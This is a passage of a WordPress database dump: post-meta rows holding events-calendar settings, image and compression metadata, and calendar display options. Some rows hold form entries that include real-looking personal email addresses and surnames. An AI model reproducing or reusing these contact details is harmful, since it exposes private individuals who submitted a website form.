rigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133445,263930,'_EventDuration','3600'),(133417,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133444,263930,'_EventEndDateUTC','2021-03-16 02:00:00'),(133418,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133443,263930,'_EventStartDateUTC','2021-03-16 01:00:00'),(133450,263930,'_EventTimezone','America/Denver'),(133419,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133442,263930,'_EventEndDate','2021-03-15 20:00:00'),(133451,263930,'_EventTimezoneAbbr','MDT'),(133420,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133441,263930,'_EventStartDate','2021-03-15 19:00:00'),(133452,263930,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(133421,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133440,263930,'_EventShowMap',''),(133453,263930,'_RTECregistrationsDisabled','1'),(133422,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133439,263930,'_EventShowMapLink',''),(133454,263930,'_RTECdeadlineType','start'),(133423,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133438,263930,'boldgrid_hide_page_title','0'),(133455,263930,'_RTECwhoCanRegister','any'),(133424,263930,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1614245469;s:12:\"_EventOrigin\";i:1614245469;s:13:\"_thumbnail_id\";i:1614245470;s:24:\"boldgrid_hide_page_title\";i:1614245470;s:17:\"_EventShowMapLink\";i:1614245470;s:13:\"_EventShowMap\";i:1614245470;s:15:\"_EventStartDate\";i:1614245535;s:13:\"_EventEndDate\";i:1614245535;s:18:\"_EventStartDateUTC\";i:1614245535;s:16:\"_EventEndDateUTC\";i:1614245535;s:14:\"_EventDuration\";i:1614245470;s:20:\"_EventCurrencySymbol\";i:1614245470;s:22:\"_EventCurrencyPosition\";i:1614245470;s:10:\"_EventCost\";i:1614245470;s:9:\"_EventURL\";i:1614245470;s:14:\"_EventTimezone\";i:1614245470;s:18:\"_EventTimezoneAbbr\";i:1614245535;s:27:\"_EventNextPendingRecurrence\";i:1614245470;s:26:\"_RTECregistrationsDisabled\";i:1614245470;s:17:\"_RTECdeadlineType\";i:1614245470;s:19:\"_RTECwhoCanRegister\";i:1614245470;s:23:\"_RTEClimitRegistrations\";i:1614245470;s:21:\"_RTECmaxRegistrations\";i:1614245470;s:16:\"_EventRecurrence\";i:1614245470;s:18:\"_RTECnumRegistered\";i:1614245470;s:13:\"_EventVenueID\";i:1614245470;s:12:\"_dp_original\";i:1614245470;s:16:\"tribe_events_cat\";i:1614271171;s:10:\"_edit_last\";i:1614245535;s:11:\"post_status\";i:1614245535;s:12:\"post_content\";i:1614245971;}'),(133426,263930,'_EventOrigin','events-calendar'),(133427,263930,'_EventOrigin','events-calendar'),(133428,263930,'_EventOrigin','events-calendar'),(133429,263930,'_EventOrigin','events-calendar'),(133430,263930,'_EventOrigin','events-calendar'),(133431,263930,'_EventOrigin','events-calendar'),(133432,263930,'_EventOrigin','events-calendar'),(133433,263930,'_EventOrigin','events-calendar'),(133434,263930,'_EventOrigin','events-calendar'),(133435,263930,'_EventOrigin','events-calendar'),(133436,263930,'_EventOrigin','events-calendar'),(133437,263930,'_thumbnail_id','263924'),(133425,263930,'_EventOrigin','events-calendar'),(133456,263930,'_RTEClimitRegistrations','0'),(133457,263930,'_RTECmaxRegistrations','30'),(133458,263930,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(133459,263930,'_RTECnumRegistered','0'),(133460,263930,'_EventVenueID','262435'),(133462,263930,'_dp_original','263923'),(133463,263930,'_edit_lock','1615333738:2'),(133464,263930,'_edit_last','2'),(144948,265285,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:699;s:6:\"height\";i:412;s:4:\"file\";s:44:\"2021/08/ESC-OCT-2021-divine-creativity-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-2-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"ESC-OCT-2021-divine-creativity-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144947,265285,'_wp_attached_file','2021/08/ESC-OCT-2021-divine-creativity-2.jpg'),(144946,265277,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:44202;s:12:\"smushed-size\";i:44202;s:15:\"savings-percent\";d:0;}'),(144945,265277,'smush-info','The file was compressed from 43.17 KB to 43.17 KB saving 0 percent using WP-Optimize'),(144944,265277,'smush-complete','1'),(144943,265277,'original-file','2021/08/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-updraft-pre-smush-original.jpg'),(144942,265279,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:52283;s:12:\"smushed-size\";i:49587;s:15:\"savings-percent\";d:5.160000000000000142108547152020037174224853515625;}'),(144941,265279,'smush-info','The file was compressed from 51.06 KB to 48.42 KB saving 5.16 percent using WP-Optimize'),(136487,264283,'enabled','0'),(144488,265243,'_field_226','arianepiriber@gmail.com'),(144309,265230,'_seq_num','129'),(144308,265230,'_form_id','21'),(144304,265230,'_field_226','elisamira@gmx.de'),(144303,265230,'_field_225','Hartmann'),(144292,265226,'_seq_num','128'),(144291,265226,'_form_id','21'),(144287,265226,'_field_226','runr5367@yahoo.com'),(144286,265226,'_field_225','Harms'),(136485,264283,'protect_children',''),(140360,264797,'_RTEClimitRegistrations','0'),(140358,264797,'_RTECdeadlineType','start'),(140319,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140350,264797,'_EventCurrencySymbol',''),(140351,264797,'_EventCurrencyPosition','prefix'),(140320,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(143427,265126,'_seq_num','22'),(137110,68102,'passster_activate_global_protection',NULL),(140359,264797,'_RTECwhoCanRegister','any'),(137108,260653,'_edit_lock','1617849222:2'),(183720,268530,'passster_activate_global_protection',NULL),(136491,264283,'popup_conversion_count','0'),(136486,264283,'popup_title','Our Spring Sale Has Started'),(183721,268530,'passster_activate_protection',NULL),(136490,264283,'popup_open_count','0'),(183722,268530,'passster_protection_type','password'),(183723,268530,'boldgrid_in_page_containers','1'),(183724,268530,'passster_area_shortcode',''),(183725,268530,'_thumbnail_id','268462'),(183727,268530,'_dp_original','268461'),(183728,268530,'_edit_lock','1698550143:2'),(183729,268530,'_edit_last','2'),(183730,268531,'protect_children',''),(183731,268531,'mec_color',''),(183732,268531,'mec_location_id','166'),(183733,268531,'mec_dont_show_map','0'),(183734,268531,'mec_organizer_id','1'),(183735,268531,'mec_read_more',''),(183736,268531,'mec_more_info',''),(183737,268531,'mec_more_info_title',''),(183738,268531,'mec_more_info_target','_self'),(183739,268531,'mec_cost',''),(183740,268531,'mec_currency','a:0:{}'),(183741,268531,'mec_additional_organizer_ids','a:0:{}'),(183742,268531,'mec_additional_location_ids','a:0:{}'),(183743,268531,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-03\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-03\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(183744,268531,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(183745,268531,'mec_certain_weekdays','a:0:{}'),(183746,268531,'mec_allday','0'),(183747,268531,'one_occurrence','0'),(136489,264283,'data_version','3'),(136353,264262,'protect_children',''),(136354,264262,'label',''),(136355,264262,'category','110'),(136356,264262,'location',''),(136357,264262,'organizer',''),(136358,264262,'tag',''),(136359,264262,'author',''),(136360,264262,'skin','monthly_view'),(136361,264262,'sk-options','a:20:{s:4:\"list\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:6:\"F d, Y\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:4:\"grid\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:9:\"D, F d, Y\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"agenda\";a:18:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:13:\"full_calendar\";a:31:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d 